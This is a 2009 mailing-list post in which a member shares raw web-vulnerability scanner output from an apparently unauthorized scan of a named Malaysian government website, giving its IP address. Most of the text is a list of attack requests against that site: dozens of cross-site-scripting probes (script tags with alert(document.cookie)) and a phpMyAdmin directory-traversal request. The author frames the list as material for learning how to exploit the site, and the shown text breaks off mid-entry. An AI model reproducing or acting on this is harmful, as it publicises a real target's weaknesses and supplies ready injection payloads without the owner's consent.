[PCBSD-malaysia] Government Web Vulnerable?

Mohd Fazli Azran Abd Malek mfazliazran at gmail.com
Thu Sep 3 10:29:05 PDT 2009


Hi everyone,

I scan one website that maybe someone interested. When i see this  
server it not weird that this web was many time got deface... i share  
with you all this web. This is one of the government website that i  
scan have many vulnerable and hope others will know and learn how  
injection and exploit can be use to application and system. Here the  
report of my scan:

---------------------------------------------------------------------------
+ Target IP:          202.186.96.231
+ Target Hostname:    www.mardi.gov.my
+ Target Port:        80
+ Start Time:         2009-09-05 1:01:01
---------------------------------------------------------------------------
+ Server: lighttpd/1.5.0
+ No CGI Directories found (use '-C all' to force check all possible  
dirs)
- Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-0: GET /help/ : Help directory should not be accessible
+ OSVDB-0: GET /vgn/jsp/jspstatus56 : Vignette CMS admin/maintenance  
script available.
+ OSVDB-0: GET /typo3conf/ : This may contain sensitive Typo3 files.
+ OSVDB-0: GET /mysql/db_details_importdocsql.php? 
submit_show=true&do=import&docpath=../../../../../../../etc :  
phpMyAdmin allows directory listings remotely. Upgrade to version  
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: GET /db_details_importdocsql.php? 
submit_show=true&do=import&docpath=../../../../../../../etc :  
phpMyAdmin allows directory listings remotely. Upgrade to version  
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: GET /3rdparty/phpMyAdmin/db_details_importdocsql.php? 
submit_show=true&do=import&docpath=../../../../../../../etc :  
phpMyAdmin allows directory listings remotely. Upgrade to version  
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: GET /phpMyAdmin/db_details_importdocsql.php? 
submit_show=true&do=import&docpath=../../../../../../../etc :  
phpMyAdmin allows directory listings remotely. Upgrade to version  
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-0: GET /SUNWmc/htdocs/ : Sun SMC (Solaris Management Console)  
is running.
+ OSVDB-0: GET /themes/mambosimple.php?detection=detected&sitename=</ 
title><script>alert(document.cookie)</script> : Mambo PHP Portal/ 
Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /index.php? 
option=search&searchword=<script>alert(document.cookie);</script> :  
Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /emailfriend/emailnews.php?id= 
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /emailfriend/emailfaq.php?id= 
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /emailfriend/emailarticle.php?id= 
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /administrator/upload.php?newbanner=1&choice= 
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /administrator/popups/sectionswindow.php?type=web&link= 
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /administrator/gallery/view.php?path= 
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /administrator/gallery/uploadimage.php?directory= 
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /administrator/gallery/navigation.php?directory= 
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /administrator/gallery/gallery.php?directory= 
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /index.php?dir=<script>alert('Vulnerable')</script> :  
Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-0: GET /https-admserv/bin/index?/ 
<script>alert(document.cookie)</script> : Sun ONE Web Server 6.1  
administration control is vulnerable to XSS attacks.
+ OSVDB-0: GET /clusterframe.jsp? 
cluster=<script>alert(document.cookie)</script> : Macromedia JRun 4.x  
JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.
+ OSVDB-0: GET /upload.php?type=\"<script>alert(document.cookie)</ 
script> : Mambo PHP Portal/Server is vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4619: GET /soinfo.php?\"><script>alert('Vulnerable')</ 
script> : The PHP script soinfo.php is vulnerable to Cross Site  
Scripting Set expose_php = Off in php.ini.
+ OSVDB-0: GET /servlet/MsgPage? 
action=test&msg=<script>alert('Vulnerable')</script> : NetDetector 3.0  
and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /servlets/MsgPage? 
action=badlogin&msg=<script>alert('Vulnerable')</script> : The  
NetDetector install is vulnerable to Cross Site Scripting (XSS) in  
it's invalid login message. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de 
%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp? 
tab1=TabsWebServer%26tab2=TabsWebLogSettings 
%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL= 
\"><script>alert(document.cookie)</script> : IIS 6 on Windows 2003 is  
vulnerable to Cross Site Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-17665: GET /SiteServer/Knowledge/Default.asp?ctr= 
\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to  
Cross Site Scripting
+ OSVDB-17666: GET /_mem_bin/formslogin.asp? 
\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to  
Cross Site Scripting
+ OSVDB-0: GET /catinfo?<u><b>TESTING : The Interscan Viruswall  
catinfo script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /templates/form_header.php? 
noticemsg=<script>javascript:alert(document.cookie)</script> :  
MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /supporter/index.php? 
t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</ 
script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ 
  versions v20020509 and older are vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php? 
t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/ 
script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/  
versions v20020509 and older are vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php? 
t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</ 
script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ 
  versions v20020509 and older are vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /sunshop.index.php? 
action=storenew&username=<script>alert('Vulnerable')</script> :  
SunShop is vulnerable to Cross Site Scripting (XSS) in the signup  
page. CA-200-02.
+ OSVDB-0: GET /submit.php?subject=<script>alert('Vulnerable')</ 
script>&story=<script>alert('Vulnerable')</ 
script>&storyext=<script>alert('Vulnerable')</script>&op=Preview :  
This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</ 
script> : Actinic E-Commerce services is vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /setup.exe?<script>alert('Vulnerable')</ 
script>&page=list_users&user=P : CiscoSecure ACS v3.0(1) Build 40  
allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: POST /servlet/custMsg?guestName=<script>alert(\"Vulnerable 
\")</script> : Bajie HTTP JServer is vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: POST /servlet/CookieExample? 
cookiename=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer  
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /servlet/ContentServer? 
pagename=<script>alert('Vulnerable')</script> : Open Market  
Inc.ÊContentServer is vulnerable to Cross Site Scripting (XSS) in the  
login-error page. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search/index.cfm?<script>alert(\"Vulnerable\")</ 
script> : Search agent allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /search.php?zoom_query=<script>alert(\"hello\")</ 
script> : Wrensoft Zoom Search Engine is vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search.php? 
searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4  
and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the  
latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /search.php?searchfor=\"><script>alert('Vulnerable');</ 
script> : Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /search.asp?term=<%00script>alert('Vulnerable')</ 
script> : ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error  
pages (only some browsers will render this). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /replymsg.php? 
send=1&destin=<script>alert('Vulnerable')</script> : This version of  
PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /pm_buddy_list.asp?name=A&desc=B 
%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 : Web  
Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php? 
module 
= 
search 
&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</ 
script> : phpWebSite 0.9.x and below are vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php? 
module 
= 
pagemaster 
&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</ 
script>&MMN_position=[X:X] : phpWebSite 0.9.x and below are vulnerable  
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /phpwebsite/index.php? 
module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+ 
\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below  
are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /phpwebsite/index.php? 
module=calendar&calendar[view]=day&month=2&year=2003&day=1+ 
%00\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and  
below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</ 
script> : PHPNuke add-on PHPToNuke is vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-32774: GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</ 
script> : Contains PHP configuration information and is vulnerable to  
Cross Site Scripting (XSS).
+ OSVDB-32774: GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</ 
script> : Contains PHP configuration information and is vulnerable to  
Cross Site Scripting (XSS).
+ OSVDB-0: GET /phpBB/viewtopic.php? 
topic_id=<script>alert('Vulnerable')</script> : phpBB is vulnerable to  
Cross Site Scripting (XSS), upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /phpBB/viewtopic.php?t=17071&highlight=\"> 
\"<script>javascript:alert(document.cookie)</script> : phpBB is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /phorum/admin/header.php? 
GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a  
and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /phorum/admin/footer.php? 
GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a  
and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /netutils/whodata.stm? 
sitename=<script>alert(document.cookie)</script> : Sambar Server  
default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /nav/cList.php?root=</ 
script><script>alert('Vulnerable')/<script> : RaQ3 server script is  
vulnerable to Cross Site Scripting (XSS).  http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /myphpnuke/links.php? 
op=search&query=[script]alert('Vulnerable);[/script]?query= :  
myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /myphpnuke/links.php? 
op=MostPopular&ratenum=[script]alert(document.cookie);[/ 
script]&ratetype=percent : myphpnuke is vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /myhome.php? 
action=messages&box=<script>alert('Vulnerable')</script> : OpenBB  
1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /msadm/user/login.php3?account_name= 
\"><script>alert('Vulnerable')</script> : The Sendmail Server Site  
User login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /msadm/site/index.php3?authid= 
\"><script>alert('Vulnerable')</script> : The Sendmail Server Site  
Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /msadm/domain/index.php3?account_name= 
\"><script>alert('Vulnerable')</script> : The Sendmail Server Site  
Domain Administrator login is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Submit/index.php? 
op=pre&title=<script>alert(document.cookie);</script> : Basit cms 1.0  
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?site_font=}--></ 
style><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php? 
name=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable  
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php? 
Default_Theme=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?bgcolor1= 
\"><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable  
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules.php? 
op 
= 
modload 
&name 
=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</ 
script> : The XForum (PHPNuke Add-on module) is vulnerable to Cross  
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php? 
op=modload&name=Xforum&file=<script>alert('Vulnerable')</ 
script>&fid=2 : The XForum (PHPNuke Add-on module) is vulnerable to  
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules.php? 
op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</ 
script> : Wiki PostNuke Module is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php? 
op 
= 
modload 
&name 
=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</ 
script> : The PHPNuke forum is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php? 
op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</ 
script> : The PHPNuke forum is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php? 
op 
= 
modload 
&name=Members_List&file=index&letter=<script>alert('Vulnerable')</ 
script> : This install of PHPNuke's modules.php is vulnerable to Cross  
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php? 
op 
=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</ 
script> : The PHPNuke forum is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php? 
op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg 
%20src=javascript:alert(document.cookie);%3E&parent_id=0 : Post Nuke  
0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules.php? 
op 
= 
modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</ 
script> : The DMOZGateway (PHPNuke Add-on module) is vulnerable to  
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules.php? 
name 
=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</ 
script> : Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules.php? 
name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</ 
script> : The PHPNuke forum is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php? 
name=Surveys&pollID=<script>alert('Vulnerable')</script> : The PHPNuke  
forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules.php? 
name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</ 
script>&month=3&month_l=test : The PHPNuke forum is vulnerable to  
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /modules.php? 
name 
= 
Stories_Archive 
&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</ 
script> : The PHPNuke forum is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php? 
name 
= 
Downloads 
&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</ 
script> : This install of PHPNuke is vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php? 
name 
= 
Classifieds 
&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</ 
script> : The PHPNuke forum is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?letter=%22%3E%3Cimg 
%20src=javascript:alert(document.cookie); 
%3E&op=modload&name=Members_List&file=index : Post Nuke 0.7.2.3- 
Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /members.asp?SF=%22;}alert('Vulnerable');function%20x() 
{v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross  
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /megabook/admin.cgi?login=<script>alert('Vulnerable')</ 
script> : Megabook guestbook is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ldap/cgi-bin/ldacgi.exe? 
Action=<script>alert(\"Vulnerable\")</script> : IBM Directory Server  
4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.
+ OSVDB-0: GET /launch.jsp? 
NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is  
vulnerable to cross site scripting (XSS) in the GetLastError function.  
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /launch.asp? 
NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is  
vulnerable to cross site scripting (XSS) in the GetLastError function.  
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /isapi/testisa.dll? 
check1=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /index.php?file=Liens&op= 
\"><script>alert('Vulnerable');</script> : Nuked-klan 1.3b is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /index.php? 
action=storenew&username=<script>alert('Vulnerable')</script> :  
SunShop is vulnerable to Cross Site Scripting (XSS) in the signup  
page. CA-200-02.
+ OSVDB-0: GET /index.php/content/search/? 
SectionID=3&SearchText=<script>alert(document.cookie)</script> : eZ  
publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /index.php/content/advancedsearch/? 
SearchText=<script>alert(document.cookie)</ 
script>&PhraseSearchText=<script>alert(document.cookie)</ 
script 
 > 
&SearchContentClassID 
=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search : eZ publish  
v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /gallery/search.php? 
searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4  
and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the  
latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /friend.php? 
op=SiteSent&fname=<script>alert('Vulnerable')</script> : This version  
of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS).  
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /forum_members.asp?find= 
%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver.  
7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /forums/index.php? 
board 
= 
;action 
= 
login2 
&user 
= 
USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</ 
script> : YaBB is vulnerable to Cross Site Scripting (XSS) in the  
password field of the login page. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /error/500error.jsp?et=1<script>alert('Vulnerable')</ 
script>; : Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is  
vulnerable to Cross Site Scripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /download.php? 
sortby=&dcategory=<script>alert('Vulnerable')</script> : This version  
of PHP-Nuke's download.php is vulnerable to Cross Site Scripting  
(XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /comments.php?subject=<script>alert('Vulnerable')</ 
script>&comment=<script>alert('Vulnerable')</ 
script>&pid=0&sid=0&mode=&order=&thold=op=Preview : This version of  
PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS).  
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /cleartrust/ct_logon.asp? 
CTLoginErrorMsg=<script>alert(1)</script> : RSA ClearTrust allows  
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /cgi-local/cgiemail-1.6/cgicso? 
query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to  
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /cgi-local/cgiemail-1.4/cgicso? 
query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to  
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /calendar.php?year=<script>alert(document.cookie);</ 
script>&month=03&day=05 : DCP-Portal v5.3.1 is vulnerable to  Cross  
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ca000007.pl?ACTION=SHOWCART&REFPAGE= 
\"><script>alert('Vulnerable')</script> : Actinic E-Commerce services  
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /ca000001.pl?ACTION=SHOWCART&hop= 
\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f : Actinic E- 
Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /article.cfm?id=1'<script>alert(document.cookie);</ 
script> : With malformed URLS, Coldfusion is vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /apps/web/vs_diag.cgi? 
server=<script>alert('Vulnerable')</script> : Zeus 4.2r2  
(webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /addressbook/index.php? 
surname=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003  
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /addressbook/index.php? 
name=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-0: GET /a?<script>alert('Vulnerable')</script> : Server is  
vulnerable to Cross Site Scripting (XSS) in the error message if code  
is passed in the query-string. This may be a Null HTTPd server.
+ OSVDB-9239: GET /mailman/admin/ml-name? 
\"><script>alert('Vulnerable')</script>; : Mailmain is vulnerable to  
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-3092: GET /sitemap.xml : This gives a nice listing of the site  
content.
+ OSVDB-25499: GET /affich.php?image=<script>alert(document.cookie)</ 
script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25498: GET /diapo.php?rep=<script>alert(document.cookie)</ 
script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25497: GET /index.php?rep=<script>alert(document.cookie)</ 
script> : GPhotos index.php rep Variable XSS.
+ OSVDB-700: GET /fcgi-bin/echo?foo=<script>alert('Vulnerable')</ 
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-3954: GET /fcgi-bin/echo2?foo=<script>alert('Vulnerable')</ 
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-700: GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</ 
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-3954: GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</ 
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)  
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-19947: GET /apps/web/index.fcgi? 
servers=&section=<script>alert(document.cookie)</script> : Zeus Admin  
server 4.1r2 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-12606: GET /index.php?err=3&email= 
\"><script>alert(document.cookie)</script> : MySQL Eventum is  
vulnerable to XSS in the email field.
+ OSVDB-12607: GET /forgot_password.php?email= 
\"><script>alert(document.cookie)</script> : MySQL Eventum is  
vulnerable to XSS in the email field.
+ OSVDB-12606: GET /bugs/index.php?err=3&email= 
\"><script>alert(document.cookie)</script> : MySQL Eventum is  
vulnerable to XSS in the email field.
+ OSVDB-12607: GET /bugs/forgot_password.php?email= 
